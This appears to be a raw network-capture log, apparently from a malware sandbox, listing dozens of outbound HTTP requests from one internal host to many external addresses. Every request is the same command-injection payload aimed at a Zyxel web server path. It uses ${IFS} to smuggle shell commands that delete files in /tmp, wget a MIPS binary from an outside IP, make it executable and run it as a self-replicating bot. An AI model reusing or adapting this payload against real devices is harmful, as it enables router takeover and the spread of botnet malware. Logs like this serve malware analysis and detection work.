                                                Jan 28, 2024 10:16:41.052510977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8554192.168.2.234629268.115.208.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052525043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8555192.168.2.2341410138.110.59.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052556038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8556192.168.2.2356370163.141.224.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052589893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8557192.168.2.2345174200.218.224.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052637100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8558192.168.2.234204847.132.96.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052654982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8559192.168.2.2358166211.247.83.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052690983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8560192.168.2.234657246.174.128.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052722931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8561192.168.2.2335912181.165.241.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052726984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8562192.168.2.2359218140.6.85.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052762032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8563192.168.2.234863876.47.224.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052763939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8564192.168.2.2360666132.39.181.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052791119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8565192.168.2.2333212192.244.78.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052826881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8566192.168.2.234887686.14.120.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052850962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8567192.168.2.2333312140.111.220.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052891970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8568192.168.2.234011413.26.100.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052891970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8569192.168.2.2354400160.240.52.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052927017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8570192.168.2.2354132124.101.219.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052958012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8571192.168.2.2349814140.72.80.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052967072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8572192.168.2.2353164119.188.148.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052993059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8573192.168.2.234591695.94.198.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053031921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8574192.168.2.233428050.223.65.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053040028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8575192.168.2.2355014208.131.225.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053040028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8576192.168.2.2349306139.26.75.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053070068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8577192.168.2.2334064116.41.38.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053073883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8578192.168.2.2349008217.249.152.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053112030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8579192.168.2.235863465.66.184.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053153992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8580192.168.2.234288884.222.54.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053184032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8581192.168.2.2347892221.85.205.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053215027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8582192.168.2.2350904194.97.90.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053244114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8583192.168.2.234349487.217.43.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053288937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8584192.168.2.2357598158.211.166.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053291082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8585192.168.2.235353643.87.133.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053319931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8586192.168.2.2337494186.1.226.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053344011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8587192.168.2.233686869.63.21.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053375006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8588192.168.2.2341360130.202.52.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053404093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8589192.168.2.2358848209.228.87.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053423882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8590192.168.2.2341702102.228.228.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053456068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8591192.168.2.234358678.5.53.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053493023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8592192.168.2.2352116183.182.94.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053507090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8593192.168.2.234263638.32.119.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053539991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8594192.168.2.233697472.130.204.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053569078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8595192.168.2.235004463.198.125.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053607941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8596192.168.2.2350400134.125.76.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053613901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8597192.168.2.2342554217.186.116.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053647041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8598192.168.2.233826036.127.75.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053683996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8599192.168.2.233823050.216.162.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053714037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8600192.168.2.2347120130.153.109.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053738117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8601192.168.2.2359422113.203.65.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053747892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8602192.168.2.234219824.50.58.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053772926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8603192.168.2.2351440141.21.222.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053788900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8604192.168.2.234706413.221.26.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053817987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8605192.168.2.235605823.142.46.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053847075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8606192.168.2.235975296.204.145.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053859949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8607192.168.2.2358266212.255.149.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053895950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8608192.168.2.234079866.9.47.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053942919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8609192.168.2.2334916193.231.44.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053967953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8610192.168.2.23566465.36.227.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.053977966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8611192.168.2.233830027.184.197.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.056018114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8612192.168.2.2342872195.78.61.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.056075096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8613192.168.2.234845813.230.103.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.056098938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8614192.168.2.2341522175.31.165.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.056539059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8615192.168.2.233576850.146.45.118443
                                                TimestampBytes transferredDirectionData
